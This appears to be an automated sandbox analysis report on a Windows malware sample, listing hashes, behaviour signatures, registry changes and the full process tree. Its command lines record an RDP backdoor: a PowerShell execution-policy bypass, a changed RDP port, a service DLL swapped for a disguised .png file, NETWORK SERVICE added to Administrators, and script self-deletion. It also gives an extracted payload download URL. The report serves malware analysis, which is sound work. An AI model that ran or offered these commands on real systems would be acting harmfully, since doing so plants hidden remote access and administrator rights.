Analysis
-
max time kernel
94s -
max time network
119s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-07-2021 01:24
Static task
static1
Behavioral task
behavioral1
Sample
f250cb14a5ab5ada5aa6d9d18a20b075.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
f250cb14a5ab5ada5aa6d9d18a20b075.exe
Resource
win10v20210408
General
-
Target
f250cb14a5ab5ada5aa6d9d18a20b075.exe
-
Size
491KB
-
MD5
f250cb14a5ab5ada5aa6d9d18a20b075
-
SHA1
789475ac6d5fda814f46a26246d0f931f41b6ba3
-
SHA256
fe65170a6f6cd5ba0df997262bca40350b650067db206bc83bfaf80da94bba9e
-
SHA512
f3119126a9c29e71f1c2eb531e61bde10eb713f3e46128d4dabddde8b54152555490b51eabbfcfc82c7906cf439124e16cb26f50e939e88d830ba048c4008147
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Core1 .NET packer 1 IoCs
Detects packer/loader used by .NET malware.
resource yara_rule behavioral2/memory/4016-138-0x000000001D940000-0x000000001DDE5000-memory.dmp Core1 -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 22 3916 powershell.exe 24 3916 powershell.exe 25 3916 powershell.exe 26 3916 powershell.exe 28 3916 powershell.exe 30 3916 powershell.exe 32 3916 powershell.exe 34 3916 powershell.exe 36 3916 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4016 CIo3LmpDP8.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000a0000000155fd-390.dat upx behavioral2/files/0x00080000000155fe-391.dat upx -
Loads dropped DLL 7 IoCs
pid Process 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 1096 Process not Found 1096 Process not Found -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2840 set thread context of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 4016 set thread context of 1768 4016 CIo3LmpDP8.exe 83 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI544B.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI54B9.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI54FA.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI54FB.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2veeho2q.mlm.ps1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_acqhw4xp.ljb.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI54D9.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 2348 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3992 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1740 powershell.exe 1740 powershell.exe 1740 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 3916 powershell.exe 3916 powershell.exe 3916 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 620 Process not Found 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeIncreaseQuotaPrivilege 1560 powershell.exe Token: SeSecurityPrivilege 1560 powershell.exe Token: SeTakeOwnershipPrivilege 1560 powershell.exe Token: SeLoadDriverPrivilege 1560 powershell.exe Token: SeSystemProfilePrivilege 1560 powershell.exe Token: SeSystemtimePrivilege 1560 powershell.exe Token: SeProfSingleProcessPrivilege 1560 powershell.exe Token: SeIncBasePriorityPrivilege 1560 powershell.exe Token: SeCreatePagefilePrivilege 1560 powershell.exe Token: SeBackupPrivilege 1560 powershell.exe Token: SeRestorePrivilege 1560 powershell.exe Token: SeShutdownPrivilege 1560 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeSystemEnvironmentPrivilege 1560 powershell.exe Token: SeRemoteShutdownPrivilege 1560 powershell.exe Token: SeUndockPrivilege 1560 powershell.exe Token: SeManageVolumePrivilege 1560 powershell.exe Token: 33 1560 powershell.exe Token: 34 1560 powershell.exe Token: 35 1560 powershell.exe Token: 36 1560 powershell.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeIncreaseQuotaPrivilege 1740 powershell.exe Token: SeSecurityPrivilege 1740 powershell.exe Token: SeTakeOwnershipPrivilege 1740 powershell.exe Token: SeLoadDriverPrivilege 1740 powershell.exe Token: SeSystemProfilePrivilege 1740 powershell.exe Token: SeSystemtimePrivilege 1740 powershell.exe Token: SeProfSingleProcessPrivilege 1740 powershell.exe Token: SeIncBasePriorityPrivilege 1740 powershell.exe Token: SeCreatePagefilePrivilege 1740 powershell.exe Token: SeBackupPrivilege 1740 powershell.exe Token: SeRestorePrivilege 1740 powershell.exe Token: SeShutdownPrivilege 1740 powershell.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeSystemEnvironmentPrivilege 1740 powershell.exe Token: SeRemoteShutdownPrivilege 1740 powershell.exe Token: SeUndockPrivilege 1740 powershell.exe Token: SeManageVolumePrivilege 1740 powershell.exe Token: 33 1740 powershell.exe Token: 34 1740 powershell.exe Token: 35 1740 powershell.exe Token: 36 1740 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeIncreaseQuotaPrivilege 3064 powershell.exe Token: SeSecurityPrivilege 3064 powershell.exe Token: SeTakeOwnershipPrivilege 3064 powershell.exe Token: SeLoadDriverPrivilege 3064 powershell.exe Token: SeSystemProfilePrivilege 3064 powershell.exe Token: SeSystemtimePrivilege 3064 powershell.exe Token: SeProfSingleProcessPrivilege 3064 powershell.exe Token: SeIncBasePriorityPrivilege 3064 powershell.exe Token: SeCreatePagefilePrivilege 3064 powershell.exe Token: SeBackupPrivilege 3064 powershell.exe Token: SeRestorePrivilege 3064 powershell.exe Token: SeShutdownPrivilege 3064 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeSystemEnvironmentPrivilege 3064 powershell.exe Token: SeRemoteShutdownPrivilege 3064 powershell.exe Token: SeUndockPrivilege 3064 powershell.exe Token: SeManageVolumePrivilege 3064 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 2840 wrote to memory of 776 2840 f250cb14a5ab5ada5aa6d9d18a20b075.exe 78 PID 776 wrote to memory of 4016 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 79 PID 776 wrote to memory of 4016 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 79 PID 776 wrote to memory of 3916 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 80 PID 776 wrote to memory of 3916 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 80 PID 776 wrote to memory of 3916 776 f250cb14a5ab5ada5aa6d9d18a20b075.exe 80 PID 3916 wrote to memory of 2348 3916 cmd.exe 82 PID 3916 wrote to memory of 2348 3916 cmd.exe 82 PID 3916 wrote to memory of 2348 3916 cmd.exe 82 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 4016 wrote to memory of 1768 4016 CIo3LmpDP8.exe 83 PID 1768 wrote to memory of 3148 1768 vbc.exe 84 PID 1768 wrote to memory of 3148 1768 vbc.exe 84 PID 3148 wrote to memory of 3748 3148 powershell.exe 86 PID 3148 wrote to memory of 3748 3148 powershell.exe 86 PID 3748 wrote to memory of 3464 3748 csc.exe 87 PID 3748 wrote to memory of 3464 3748 csc.exe 87 PID 3148 wrote to memory of 1560 3148 powershell.exe 88 PID 3148 wrote to memory of 1560 3148 powershell.exe 88 PID 3148 wrote to memory of 1740 3148 powershell.exe 91 PID 3148 wrote to memory of 1740 3148 powershell.exe 91 PID 3148 wrote to memory of 3064 3148 powershell.exe 93 PID 3148 wrote to memory of 3064 3148 powershell.exe 93 PID 3148 wrote to memory of 3428 3148 powershell.exe 96 PID 3148 wrote to memory of 3428 3148 powershell.exe 96 PID 3148 wrote to memory of 3992 3148 powershell.exe 97 PID 3148 wrote to memory of 3992 3148 powershell.exe 97 PID 3148 wrote to memory of 3648 3148 powershell.exe 98 PID 3148 wrote to memory of 3648 3148 powershell.exe 98 PID 3148 wrote to memory of 2688 3148 powershell.exe 99 PID 3148 wrote to memory of 2688 3148 powershell.exe 99 PID 2688 wrote to memory of 3476 2688 net.exe 100 PID 2688 wrote to memory of 3476 2688 net.exe 100 PID 3148 wrote to memory of 3456 3148 powershell.exe 101 PID 3148 wrote to memory of 3456 3148 powershell.exe 101 PID 3456 wrote to memory of 2152 3456 cmd.exe 102 PID 3456 wrote to memory of 2152 3456 cmd.exe 102 PID 2152 wrote to memory of 2784 2152 cmd.exe 103 PID 2152 wrote to memory of 2784 2152 cmd.exe 103 PID 2784 wrote to memory of 3544 2784 net.exe 104 PID 2784 wrote to memory of 3544 2784 net.exe 104 PID 3148 wrote to memory of 2044 3148 powershell.exe 105 PID 3148 wrote to memory of 2044 3148 powershell.exe 105 PID 2044 wrote to memory of 3752 2044 cmd.exe 106 PID 2044 wrote to memory of 3752 2044 cmd.exe 106 PID 3752 wrote to memory of 3732 3752 cmd.exe 107 PID 3752 wrote to memory of 3732 3752 cmd.exe 107 PID 3732 wrote to memory of 784 3732 net.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe"C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exeC:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe"C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2hiqqri\n2hiqqri.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB1F.tmp" "c:\Users\Admin\AppData\Local\Temp\n2hiqqri\CSC72CDF387873646DFBE82C45218898BF9.TMP"7⤵PID:3464
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f6⤵PID:3428
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f6⤵
- Modifies registry key
PID:3992
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f6⤵PID:3648
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add7⤵PID:3476
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\system32\cmd.execmd /c net start rdpdr7⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\net.exenet start rdpdr8⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr9⤵PID:3544
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\cmd.execmd /c net start TermService7⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\system32\net.exenet start TermService8⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService9⤵PID:784
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f6⤵PID:780
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f6⤵PID:3948
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\f250cb14a5ab5ada5aa6d9d18a20b075.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:2348
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:3836
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3576
-
-
-
